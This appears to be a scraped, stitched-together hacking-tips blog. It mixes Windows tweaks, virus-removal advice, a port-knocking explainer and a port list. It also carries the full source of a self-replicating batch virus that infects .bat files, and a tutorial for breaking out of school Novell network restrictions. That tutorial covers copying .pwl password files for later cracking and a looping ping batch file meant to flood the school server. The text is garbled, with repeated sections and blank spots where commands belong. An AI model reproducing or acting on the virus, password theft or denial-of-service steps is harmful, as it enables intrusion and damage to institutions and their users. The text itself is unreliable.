open dos command,go to -(Start/Run/type "command" without inverted commas and hit enter),& in the MSDOS prompt,type:
netstat -a
(make sure you include the space in between the "t" and the "-a").

This command will show u the host name of the lamer and ofcorse urz also ..ur host name will be under local address and his wud be under foreign address.. note any suspicious name and every numbr u c aftr the host name under foreign address which is new and suspicious there(numbers are ports but i consider u totally unaware).
After ur done,now type
Netstat -an (again a space between "t" and "-an")

this will list all connections in numerical form, which makes it a lot easier to trace malicious users....Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can also find out what your own IP address is, which is always useful.

It wud look a bit like this
Proto.....Local Address.....Foreign Address.....State
TCP.......Your IP:Port......
TCP.......Your IP:Port......A New IP:Port.......Established

A New IP:Port -note that stuff
Now that u have a IP Addess and a host name,type
tracert type IP address/Hostname here

write whole thing there.. thats after u write tracert give a space then type A New IP we found in last step.. give a / then write..Host name we found in first step.remember no port there to be added..
This will trace the lamer which is prolly using a trojan on ur computer to do what he wants..result will give u some ip addresses ..note all of them
now go to
write ip addresses in the box and see where the ips belong to..some ips will give u ISPs like mtnl ... last ip wud be his ip call ur or his ISP & inform dem abt it!DO RESPOND 2 DIS..

Hide in the (Network) Neighborhood

Hide in the (Network) Neighborhood
Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show upAdd Open With to all files:
You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with. I use three different text editors so I added it to the ".txt" key.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way. in the network browse list.

DUMMY virus 3

It will affect *.com and *.EXE files .It will multiply itself and may get more dangerous when altered.
Here is the code -
The code
Here is the code -


@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=

if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
goto ViRuS_findself

for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

echo on>nul.ViRuS
echo This is the dummy Virus
Hacking windows SEND TO MENU
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Hacking windows SEND TO MENU

Hacking windows SEND TO MENU
I know this is a very simple thing but the problem, as like many other issues, is the ignorance about it.

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and do a CTRL –C. Open the destination folder and do a CTRL-V. Here is something you can benefit time from. Customize your SEND TO MENU.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you’ll need access to hidden files. So change your view settings to make all hidden files visible.
Tools -> folder options -> view (tab) and select the show hidden files and folders.
go to parent drive:/documents and settings/(user name)/send to

Open up my computer and locate your most used folders.

Create a shortcut of the most used folders in SEND TO FOLDER.You can do this in a number of ways.

Right click -> send to desktop(create shortcut) and move the shortcut from the desktop to the SEND TO FOLDER

Copy the most used folder and go to SEND TO FOLDER and right click -> paste shortcut.

Also remember to rename the shortcuts to send to videos or send to potos. We don’t need confusion when we use9) How to remove the shortcut arrow from the deskt
Open Regedit and navigate to the following key:

change drive icons

change drive icons.....

first of all copy a icon file to the root of the drive.
example: c:\icon.ico

then create a file called: autorun.inf in c:\autorun.inf
then open that file and type the following:


save and close the file.

now open my computer and resfresh.. and woh! icon changed....
you can apply to other drives too.

be carefull:

"autorun.inf" and "ico.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\icon.ico.
same on the root.

ENJOY, this works on 98 too!!!!!!!!!!!!!!!!!!

Load kernel into RAM for faster startups

Load kernel into RAM for faster startups
Use only if u have 512MB or more..
in registry editor
navigate to:


set the value of DisablePagingExecution key to 1.

reboot is required

Disable User Tracking To Increase resources

Disable User Tracking To Increase resources
navigate to


in registry editor and

set the DWORD NoInstrumentation to 1. This will disable most of user tracking features of XP..

Load apps Faster

Load apps Faster

Navigate to

in registry editor
change the value from 3 to 5 or even upto 9

it needs a reboot...

Hide the username on start menu

Hide the username on start menu

Navigate to:



Change the DWORD Valude NoUserNameInStartMenu to 1 to hide the username to display..




When you doubleclick on one of your hard drive partitions, it show you some unexpected results?

When you rightclick on one of your hard drive partitions, you see a new item called "Autoplay" on top of other items with bold face?

When you right click on one of your hard drive partitions, do you see some new items with garbage text?

THIS IS Perlovga virus (otherwise known as temp2.exe) or one of its variants. The problem is that this virus is particulary cumbersome to remove, even by reputable anti-virus programs. But their is a solution and it is called PRT (or Perlovga Removal Tool)!

What does this tool do?
It detects and reoves all traces of the Perlovga virus from your system, including floppy disks and USB flash disks (the latter ones must be write enabled during the scan process).

It also removes the leftovers of this virus by removing the 'autorun.inf' files and cleaning up you system registry, so you won’t see the 'autoplay' item anymore.

How to use it?
Start your computer in Safe mode and run this tool. If you have infected floppy/flash disks you can insert them and click start. You can repeat this process for every disk you have

Newfolder.exe virus SOLUTION


if u r infected with this virus then the following problems will occur in ur pc:

1. u'll find New Folder.exe file in the root path of every storage media you have?

2. u'll find a new folder inside every folder you have?

3. When you doubleclick on one of your hard drive partitions, it shows you some unexpected results?

4. When you rightclick on one of your hard drive partitions, you see a new item called "Autoplay" on top of other items with bold face?

5. When you right click on one of your hard drive partitions, you see some new items with garbage text?

6. When your Antivirus detects and deletes the malware that causes all of that and restart your system, you see an error message similar to: "Windows cannot find SSCVIIHOST.exe..."?

If your answer was ‘Yes’ to any of the above questions then the chances are that you may be infected with the Sohanad virus (otherwise known as New Folder.exe) or one of its variants:

The problem is that this virus is particulary cumbersome to remove, even by reputable anti-virus programs. But their is a solution and it is called SRT (or Sohanad Removal Tool)!

What does this tool do?
It detects and reoves all traces of the Sohanad virus from your system, including floppy disks and USB flash disks (the latter ones must be write enabled during the scan process).

It also removes the leftovers of this virus by removing the 'autorun.inf' files and cleaning up you system registry, so you won’t see the 'autoplay' item anymore.

How to use it?
Start your computer in Safe mode and run this tool. If you have infected floppy/flash disks you can insert them and click start. You can repeat this process for every disk you have.


Restrictions creating virus solution

* Disable Ctrl+Alt+Del ,Disable Folder Options,Disable Regedit,Disable Show hidden files & folders ,Disable Run Command,Disable Windows Firewall,Hide Desktop items,Hide Taskbar,Restrict Internet Explorer Home Page Changing,Hide Internet Options,etc

some virus creates system restrictions in order to hide itself from easy detection. These restrictions are most often:

1 - Disable Ctrl+Alt+Del -- so the user can't see the virus and the other applications running!

2 - Disable Folder Options --so the user can't set the option to show hidden files!

3 - Disable Regedit -- so the user can't see what is going on during system startup!

4 - Disable Show hidden files & folders -- so even if you select "Show hidden files and folders from folder options these files & folder will not be shown!

5 - Disable Run Command -- so the user can't use it to run some tools to track the virus activites of remove it.

6 - Disable Windows Firewall -- so the virus can send & receive any data through the network without the attention of the user!

7 - Hide Desktop items to prevent the user from accessing My Computer and other desktop shortcuts!

8 - Hide Taskbar -- so the user can't explore start menu!

9 – Restrict Internet Explorer Home Page Changing -- so the user can't change the malicious web page set by the malware!

10 – Restrict Internet Explorer Closing -- so the user can't close the pops up windows that appear when visiting the malicious web page or any other website!

11 – Hide Internet Options -- so the user can't change any setting set by the malware!

12 – Hide Internet Explorer Address Bar -- so the user can't see what web page being visited and what scripts being executed!

13 - Restrict Internet Explorer Right Click -- so the user can't veiw the source of the page being visited and other useful things.

14 – Hide Internet Explorer Navigation Buttons -- so the user will be forced to user the keyboard shortcuts to navigate through the web sites!

15 - Hide Internet Explorer Context Menu -- so the user can't access this menu which make him able to select some useful settings.

16 - Hide Internet Explorer Toolbar -- so the user can't use it to remove some unwanted toolbars made by the malware.

Unfortunately, AV Software doesn’t really care about these restrictions and do nothing to re-enable them!but u can fix those virus with the help of this tool



guys if anybody of u have a problem like whenever u try to open taskmanager(alt+ctrl+del) or registry editor(run command 'regedit') , it says "Task Manager/registry editor has been disabled by your administrator" . then u are infected by a virus . to fix that virus their are 2 ways :

1. create another account in ur system and delete the previous one . and it's gone. i hope u all know how to make accounts. this soft(CLICK HERE TO DOWNLOAD).restart in safe mode.execute it.reboot in normal boot.u r done

guys if anybody of u have a problem like whenever u try to open taskmanager(alt+ctrl+del) or registry editor(run command 'regedit') , it says "Task Manager/registry editor has been disabled by your administrator" . then u are infected by a virus . to fix that virus their are 2 ways :

1. create another account in ur system and delete the previous one . and it's gone. i hope u all know how to make accounts.


download this soft.restart in safe mode.execute it.reboot in normal boot.u r done



This For all those who have started hacking or just have a craze for hacking . here is a cool way of testing are u eligible to enter the field of hacking.try this test . and be honest please , dont ditch yourself. u can find its solution on the net but still plz dont try to find it. just check urself how fast ur mind can work

now after loging to this link tell me ur time needed and please dont ask for help or hint


muhahaha virus solution

if u r infected ith this virus then whenever u'll open orkut
the browser window get automatically closed and a dialog box appears saying

To fix it

go to the windows directory of ur pc.. most probably it's c: seacrch for the folder name heap41(it's hidden)... delete it also
go to search menu and type heap41a and press enter. many files and folders will be displayed. delete all of them.
then go to run->regedit->edit->find and type heap41a as search query...

delete any serach result which contains the word heap.
restart your system adn u can access gmail and orkut now.......


All Bout Port Knocking

In computing, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specified port(s).

This is usually implemented by configuring a daemon to watch the firewall log file for said connection attempts then modify the firewall configuration accordingly. It can also be performed by a process examining packets at a higher level (using packet capture interfaces such as Pcap), allowing the use of already "open" TCP ports to be used within the knock sequence. Port knocking is most often used to determine access to port 22, the Secure Shell (SSH) port. The port "knock" itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine. The complexity of the knock can be anything from a simple ordered list (e.g. TCP port 1000, TCP port 2000, UDP port 3000) to a complex time-dependent, source-IP-based and other-factor-based encrypted hash.

A port knock setup takes next to no resources and very simple software to implement. A portknock daemon on the firewall machine listens for packets on certain ports (either via the firewall log or by packet capture). The client user would carry an extra utility, which could be as simple as netcat or a modified ping program or as complicated as a full hash-generator, and use that before they attempted to connect to the machine in the usual way.

Most portknocks are stateful systems in that if the first part of the "knock" has been received successfully, an incorrect second part would not allow the remote user to continue and, indeed, would give the remote user no clue as to how far through the sequence they failed. Usually the only indication of failure is that, at the end of the knock sequence, the port expected to be open is not opened. No packets are sent to the remote user at any time.
While this technique for securing access to remote network daemons has not yet been widely adopted by the security community, it has been integrated in newer rootkits.

Step 3

Step 4

How Port knocking works in theory

Step 1 (A) Client cannot connect to application listening on port n; (B) Client cannot establish connection to any port.

Step 2 (1,2,3,4) Client tries to connect to a well-defined set of ports in sequence by sending certain packets; Client has prior knowledge of the port knocking daemon and its configuration, but receives no acknowledgement during this phase because firewall rules preclude any response.

Step 3 (A) Server process (a port knocking daemon) intercepts connection attempts and interprets (decrypts and decodes) them as comprising an authentic "port knock"; server carries out specific task based on content of port knock, such as opening port n to the client.

Step 4 (A) Client connects to port n and authenticates using application’s regular mechanism.

Benefits of port knocking

Consider that, if an external attacker did not know the port knock sequence, even the simplest of sequences would require a massive brute force effort in order to be discovered. A three-knock simple TCP sequence (e.g. port 1000, 2000, 3000) would require an attacker without prior knowledge of the sequence to test every combination of three ports in the range 1-65535, and then to scan each port in between to see if anything had opened. As a stateful system, the port would not open until after the correct three-digit sequence had been received in order, without other packets in between.

That equates to approximately 655354 packets in order to obtain and detect a single successful opening. That's approximately 18,445,618,199,572,250,625 or 18 million million million packets. On the average attempt it would take approximately 9 million million million packets to successfully open a single, simple three-port TCP-only knock by brute force. This is made even more impractical when knock attempt-limiting is used to stop brute force attacks, longer and more complex sequences are used and cryptographic hashes are used as part of the knock.

When a port knock is successfully used to open a port, the firewall rules are generally only opened to the IP address that supplied the correct knock. This is similar to only allowing a certain IP whitelist to access a service but is also more dynamic. An authorised user situated anywhere in the world would be able to open the port he is interested in to only the IP that he is using without needing help from the server administrator. He would also be able to "close" the port once he had finished, or the system could be set up to use a timeout mechanism, to ensure that once he changes IP's, only the IP's necessary are left able to contact the server. Because of port knocking's stateful behaviour, several users from different source IP addresses can simultaneously be at varying levels of the port knock. Thus it is possible to have a genuine user with the correct knock let through the firewall even in the middle of a port attack from multiple IP's (assuming the bandwidth of the firewall is not completely swamped). To all other IP addresses, the ports still appear closed and there is no indication that there are other users who have successfully opened ports and are using them.

Using cryptographic hashes inside the port knock sequence can mean that even sniffing the network traffic in and out of the source and target machines is ineffective against discovering the port knock sequence or using traffic replay attacks to repeat prior port knock sequences. Even if somebody did manage to guess, steal or sniff the port knock and successfully use it to gain access to a port, the usual port security mechanisms are still in place, along with whatever service authentication was running on the opened ports.

The software required, either at the server or client end, is minimal and can in fact be implemented as simply as a shell script for the server or a Windows batch file and a standard Windows command line utility for the client. Overhead in terms of traffic, CPU and memory consumption is at an absolute minimum. Port knock daemons also tend to be so simple that any sort of vulnerability is obvious and the code is very easily auditable. With a portknock system in place on ports such as the SSH port, it can prevent brute force password attacks on logins. The SSH daemon need not even wake up as any attempt that is made without the correct portknock will bounce harmlessly off the TCP/IP stack rather than the SSH authentication. As far as any attacker is concerned, there is no daemon running on that port at all until he manages to correctly knock on the port. The system is completely customisable and not limited to opening specific ports or, indeed, opening ports at all. Usually a knock sequence description is tied with an action, such as running a shell script, so when a specific sequence is detected by the port knock daemon, the relevant shell script is run. This could add firewall rules to open ports or do anything else that was possible in a shell script. Many portknocks can be used on a single machine to perform many different actions, such as opening or closing different ports.

Due to the fact that the ports appear closed at all times until a user knowing the correct knock uses it, port knocking can help cut down not only on brute force password attacks and their associated log spam but also protocol vulnerability exploits. If an exploit was discovered that could compromise SSH daemons in their default configuration, having a port knock on that SSH port could mean that the SSH daemon may not be compromised in the time before it was updated. Only authorised users would have the knock and therefore only authorised users would be able to contact the SSH server in any way. Thus, random attempts on SSH servers by worms and viruses trying to exploit the vulnerability would not reach the vulnerable SSH server at all, giving the administrator a chance to update or patch the software. Although not a complete protection, port knocking would certainly be another level of defense against random attacks and, properly implemented, could even stop determined, targeted attacks.

Port knocking generally has some disregard in the security world, given that early implementations basically consisted of a number of ports that had to be hit in order. However, the best of modern portknock systems are much more complex, some using highly secure cryptographic hashes in order to defeat the most common attacks (such as packet sniffing and packet replay). Additionally, portknock systems can include blacklists, whitelists and dynamic attack responses as can any internet service, however, even the simplest of port knocks controls access to a system before attackers are able to hit a service that allocates memory, CPU time or other significant resources and also acts as a barrier against brute-force attempts, automated vulnerability exploits, etc. Also, port knocking does not generally lower the security of a system overall. Indeed, it provides another layer of security for minimal overhead. In a worst case scenario however, the port knocking software introduced a new security problem or lowers security due to risk compensation.

i liked to share this information its really Knowledgeable


Common Ports
The Common Ports are assigned by the IANA and on most systems can only be used by system (or root) processes or by programs executed by privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical connections which carry long term conversations. For the purpose of providing services to unknown callers, a service contact port is defined. This list specifies the port used by the server process as its contact port.

Port Assignments for Common Ports:

Port UDP TCP Definition
7 x x echo
9 x x discard
11 x x systat
13 x x daytime
17 x x quote of the day
19 x character generator
20 x ftp - data
21 x ftp - control
23 x telnet
25 x smtp mail transfer
37 x x timeserver
39 x rlp resource location
42 x x nameserver
43 x nicname whois
53 x x dommainlein name server
67 x bootpc bootstrap protocol
68 x bootpc bootstrap protocol
69 x tftp trivial file transfer
70 x gopher
79 x finger
80 x http
88 x x kerberos
101 x hostname nic
102 x iso-tsap class 0
107 x rtelnet
109 x pop2
110 x pop3
111 x x sunrpc
113 x identification protocol
117 x uucp
119 x nntp
123 x ntp
135 x x epmap
137 x x netbios - name service
138 x netbios - dgm
139 x netbios - ssn
143 x imap
158 x pcmail - srv
161 x snmp
162 x snmptrap
170 x print - srv
179 x border gateway protocol
194 x irc internet relay chat
213 x ipx
389 x ldap
443 x x https (ssl)
445 x x microsoft - ds
464 x x kpasswd
500 x isakmp key exchange
512 x x remote execute
513 x x login / who
514 x x shell cmd / syslog
515 x printer spooler
517 x talk
518 x ntalk
520 x x router / efs
525 x timeserver
526 x tempo
530 x rpc
531 x conference chat
532 x netnews newsreader
533 x netwall
540 x uucp
543 x klogin
544 x kshell
550 x new - rwho
556 x remotefs
560 x rmonitor
561 x monitor
636 x ldaps over tls/ssl
666 x x doom id software
749 x x kerberos administration
750 x kerveros version iv
1109 x kpop
1167 x phone
1433 x x ms - sql - server
1434 x x ms - sql - monitor
1512 x x wins
1524 x ingreslock
1701 x l2tp
1723 x pptp point to point
1812 x radius authentication
1813 x radius accounting
2049 x nfs server
2053 x kerberos de - multiplexor
9535 x man remote server


EDIT: Download this latest Pack containing all the tools
This pack will be updated twice a week.

Download :

You will have to fill a free survey of 1 minutes to get this.As i dont want every tom dick and harry to get theri hands on this exotic stuff.

1. Introduction (PLEASE READ)
2. Novell - What You Need to Know
3. The Basics of Novell Hacking
i. Navigating the Network
ii. Command Prompt
iii. Floppy / CD
iv. Gaining Admin
v. Other stuff...
4. Advanced Novell Hacking
i. Tools

ii. File / Print Sharing
iii. SAM
iv. Access the Server
v. Viewing "restricted" drives


Before we get started, let me get a couple of things straight. First of all, I hate it when I
surf the web and can't ever access any site without having shit like "This site is for
educational purposes only" pop up. For you people who are like me, I'll do you all a favour.

Which brings me to my next point. Admins. Most schools across the world have admins that think
they're the smartest things on two legs because they got some diploma that says they know how to
turn on a computer. Well, for any admins that think this way and are reading this tutorial, let
me say this: your diploma or certificate or whatever doesn't mean shit. Sure, it makes you look
smart on paper, but in the real world, if you're lazy or just plain stupid, you will get 0wned
by a person that you think is too young or too stupid to do any real damage to your network.
Make no mistake: if you stop learning, if you stop surfing the web to sharpen your skills, if
you stop caring about your network, sooner or later, some punk who's gonna try and have some
fun's gonna make your life really shit really fast when you find out that you are way out of
your depth real quick. Enough said. Always keep up with what's happening on the web, no matter
how much time you have to put into it.

Moving on. Now I would like to get some things straight about myself. Although I have made this
tutorial for people wishing to gain privileges in Novell, this tutorial isn't for everybody.
Although I like to think I'm a nice guy, there are certain people I dislike. These are the
people who always want you to do things for them. They never want to learn because they "can't
be bothered" so they always come to you for help. This tutorial is not for people who want the
easy way out. If the only reason you want to know how to do this is so you can impress your
friends, close this tutorial and click on it's icon. Now press Shift+DEL. There we go. That
probably got rid of some of them. Anyway, this tutorial is being written for serious people who
have little or no knowledge of Novell simply because they haven't come across it. No problem.

Novell - What You Need To Know

Let's start off with the question "What is Novell?" Novell is basically a program that you
install over windows that works over a network to give users appropriate access. For example,
many schools use Novell because it allows them to give students limited rights so they can only
do what the admin allows them to (erhem). There is always at least one administrator to
supervise the network and manage student accounts.

Novell is a respected company that has been making security related programs for a long time.
Unfortunately, in recent years, Novell has been slipping up when it comes to the integrity of
their programs. Not surprisingly, many security holes have been found and many more are on their

The Basics of Novell Hacking

As with any hack, we must first decide on the objective ie what do we want to achieve? Well,
let's go through it. Since you have physical access to the network, chances are you use it quite
often. Therefore you probably wouldn't want to install a virus as you would only be doing
yourself a bad favour. In places like schools, it is very common for admins to restrict access
to the floppy or cd drives as they don't want people bringing in stuff like viruses, corrupt
files or even games. We will soon see how to access these files anyway. Maybe you want admin
rights? If the admin is stupid, even this is possible. Do you want to install a game? Do you
want to look at other users files? All these things and more are possible on some Novell
networks. What you have to understand as either a user or an admin is that networks will always
have flaws. I have classified Novell networks into three basic categories:

* shit security
* ok security
* perfect flawless security

In my experience, I have come across two of the above mentioned types of networks. Guess which
two. Note that many systems start off in the "shit security" category but move up into the "ok
security" category. When this happens, a hacker that had gotten used to a certain system may be
depressed for a while. Until he or she finds new holes. There is only so much an admin can
disable on your computer before it becomes a vegetable and of absolutely no use to anyone.
That's why we use whatever programs we have left to our advantage. If you are a student then you
will undoubtedly have programs that aid in study, such as Notepad, MS Word, you may have
Powerpoint etc. All these programs can be used to our advantage.

First of all, let me cover the "shit" network class. In this network class, you should be able
to do anything. If something you do comes up with the message "This operation has been cancelled
by the Administrator" or "You have insufficient rights to execute this command" or something to
that effect, then the network falls into the "ok" class. Anyway, if your network falls into the
"shit" class, you should be able to open Internet Explorer then go File > Open then Browse...
When you do this, you will be able to see the entire C: drive of the computer, though you may
not necessarily be able to open any of the files.

***Note: This tutorial assumes that the Desktop has been stripped of all icons and the start
menu is almost bare if not completely removed.

OK. Now that we can see the path of all the files, we click Browse... again and attempt to open
a file using IE. Pick a useful file like "" if you are using winnt. When you find the
file, click ok and you will have a little box with the full pathname of the file. You can either
OK, Cancel or Browse... Do neither. Copy the pathname. Now open MS Word. Go to View > Toolbars
then go to Visual Basic. A toolbox will pop up. Click "Design Mode". A new toolbox should pop up
again. This time click the "Command Button" which just looks like a small rectangle. When the
button pops up, double click it. You should be taken to a VB screen with the following in the

Private Sub CommandButton1_Click()

End Sub

Now type in...
...and hit F5 (Debug), so your screen looks like

Private Sub CommandButton1_Click()
End Sub

Hopefully, a minimized command screen will come up. If it doesn't, try this:

Private Sub CommandButton1_Click()
a = SHELL("C:\winnt\system32\",vbNormalFocus)
End Sub

Hit F5 again. If this doesn't work there could be a number of things wrong. If a screen comes up
saying macros have been disabled, go back to your first Visual Basic toolbar. One of the buttons
says "Security...". Click it, then select the option that says "Low". Try again. If this was the
problem, you are lucky. If it still doesn't work, read on. If it says "Run-time error:'53'---
File not found" you are in trouble. It means you either fucked up the pathname or it isn't
there. Of course, if your computer is running win2k or xp you will have to slightly adjust your
pathname to the one above.

***Note: I recommend you use as apposed to cmd.exe. The main reason is that cmd.exe
can be blocked off by your administrator, so as soon as you open it you will get something that
says "CMD has been restricted by your administrotor. Press any key to continue...". If this
happens, cmd is useless.

Now we move on to Powerpoint. This is a very simple way of opening files. You create any slide,
then right clock and go "Hyperlink" or whatever it says. From there you are able to link it to
any file on the computer. When you view the slide show, click on the hyperlink and you will open
the file.

Now we move on to Notepad. Notepad is one of those things that I would kill for. It is just so
versatile that it can be used for anything and everybody has it, so there are never any problems
with compatibility. That's part of the reason most tutorials, including this one, are written in
Notepad. The way we will use Notepad in this example is by creating a hyperlink to a document,
much like what we did with Powerpoint. So we open Notepad then type:


We then go to File > Save as... then we type in "link.html" in our private drive (the drive the
admin has allocated to each user for storage of personal files, sometimes also called My
Documents). When we refresh the drive, we should be able to see an IE icon called "link.html".
Double click it, then click the hyperlink. Hope it works!

Now we will try creating shortcuts. This is probably the easiest method to use to get into DOS
(strictly speaking this is not true DOS, but for the purpose of this tutorial I will refer to it as such).
That's the reason I saved it for last. The earlier methods allow you to fish around inside the
network and get to know how it works, what makes it tick. Not to mention that the previous
methods were not limited to accessing command, but allowed us to open ANYTHING. Now let's take a
look at how shortcuts work. Open your local drive, then right click and go to New > Shortcut
(if you have right click disabled go to File > New > Shortcut). In the space provided type
"command" and hit next. Now click finish. You should have a shortcut placed on your drive that
takes you to DOS.

Now let's take a look at QBasic. QBasic is a primitive sequential programming language used to
create really crappy programs. Luckily, most schools have QBasic in their syllabus, so you
should have the icon. If you do, you are lucky. Open QBasic, then when you get to the main
screen, type...


...and Hit F5

This will immediately open up DOS for you. Cool huh? So, what can we do with DOS? If you need to
be asking that question then you shouldn't be reading this tutorial, but briefly I will tell you
that DOS is very helpful when accessing anything, whether it be on a hardrive, floppy, cd or
anywhere else.

Speaking of floppy, you may be wondering how to access it or cds on a network that appears to be
completely locked down. There are a couple of ways. First of all, if you can see any drives as
icons, try right clicking on them. You might have an option that says "Map Network Drive" and
"Disconnect Network Drive". If this is the case, find out which one is the floppy drive (try a:
or b: first) and disconnect it. Now, in the address bar in any window, type "a:" and you should
be taken to the floppy.

If this doesn't work, then don't worry. Heaps of things definitely will. Of course it depends
greatly on the network, but generally the principle is the same. In a network where you don't
have the luxury of being able to freely browse everything, you have to be shifty. In your
private drive, try creating a shortcut to a:. This will almost definitely not work but is worth
a try. Also, try going to File > Winzip > Zip to file. This will allow you to transfer files
to your floppy.

Lastly, we can use DOS. This is my favourite method because it's hell hard to disable shit in
DOS, at least, effectively, so there aren't heaps of ways around it. In DOS type:


Volume in A has no label
Volume Serial Number is 0001-0AA0
Directory of A: 111,111 1/1/04 111,111 1/1/04


So now we can see what's on the disk. If you wanna run it you can type:


However, a more efficient way of opening it would be to first copy it to your private drive. We
do this by typing:

A:\>copy a:\*.zip h:

Assuming h: is your private drive. The wildcard will copy all files with the extension ".zip".
The same way, we can open cds. Exactly the same. Sometimes when we copy it to our drives we get
the message that "This operation has been cancelled by your administrator". In this case, we go
back to MS Word and open a VB macro. Type in the path and you open it. No questions asked and no
crappy prompts. By the way, you can also use a macro to open files directly from the floppy or
cd. I just prefer not to. I think it's easier to just copy them directly. Also you don't have to
check the pathname every time you want to open a new file. But whatever. Do what you feel
comfortable with. There is another way of getting access to the a: drive using the "net use"
command, but more about that later.

Another extremely useful thing you can do with DOS access is type something like:

C:\>copy c:\winnt\*.pwl a:

This command copies all the .pwl (password) files that are stored in the winnt directory. We can
now take the disk home and crack the password files in our own time at our own leisure. This
only works on crappy networks though. Most reasonably secure or just new networks no longer
store their passwords in .pwl files. In win2k, there's a new thing called SAM (Security Accounts
Manager). This is much harder to break, so more on that later.

Now for a quick lesson on network file sharing. In some networks, the admin allows you access to
all drives. If this is the case, there should be a drive which contains the files of all people
who have access to the network. Once you find the drive, simply scroll down to the folder with
the same name as the targets login name and you can browse their personal files. It should be
noted, however, that this kind of file sharing is only allowed on the shittiest of crappy
networks. I have come across it only once in my life =)

Now let's move on to something that may seem obvious, yet many people don't even consider.
Downloading off the web. As an admin, it is really very simple to turn off downloads. However,
you would be surprised how many admins forget about it and leave the web open to all their users
for all intents and purposes. I think the usefulness of being able to download files off the
internet is quite obvious, so I won't go on for long. In case you have absolutely no
imagination, the internet could be used for downloading backdoor programs, viruses (again,
what's the point?), password crackers or even just simple things like DOS =)

On a slightly different topic, DOS has many features that the common happy internet user doesn't
know, or doesn't need to know about. The most interesting one of these is Netstat. Netstat is a
time honoured command that allows the user to see all the inbound and outbound connections his
computer is engaged in. Netstat has many uses, but we will only quickly look at the most useful.
For the common internet user, Netstat can be used to find out, for example, whether or not they
have a trojan installed on their computer. For example, if they type in Netstat and see that
some computer has established a connection with them on a high numbered port such as 12345, they
know they're in trouble. Although by this time it may be too late, the person could then
terminate his internet connection and run down to the store to buy the latest anti-virus. Just
an example. For people who have malicious intentions, Netstat is an invaluable tool for quickly
and easily finding out someone's IP address or hostname. The trick is to send them a file and
execute the command. This file can be sent using anything; IRC, MSN etc.

***Note: Netstat usually shows only the hostname of the target. For an actual IP, type
Netstat -n.

At this point, you may be wondering why I'm wasting time in showing off my DOS skills. The
reason is that if you're connected to a network, Netstat can show you the IP of the server ie
the "big daddy" computer which runs and maintains the network. In theory, if you wanted to and
you knew the IP of the server, you could create a DoS (Denial of Service) attack on the server.
In the old days this could be achieved by pinging the server with large packets in an infinite loop.
You might me less lucky these days... but hey, it's worth a shot.

Something really cool with DOS is that you can create batch files that execute commands in DOS.
Batch files are basically little programs that you can get to fire off commands. For example, I
can create a batch file that pings the server until I turn off the file. I can, of course, use
all the same commands that I could in an actual DOS window. Thus I can specify how many packets
I send, the timeout, packet size etc.

Creating batch files is incredibly simple. Open up Notepad, then type:

ping -t -l 1000 [This is the command you want to run]
ping.bat [Creates a loop to repeat command forever]

Now save this file as ping.bat, or anything you want it to be called but make sure you change
the filename at the bottom of the bat file to ensure a loop. The cool thing about this is that
it doesn't wait for the command to be completed. It immediately starts the next command
regardless of the result of the previous one. This method can, of course, be used to execute any
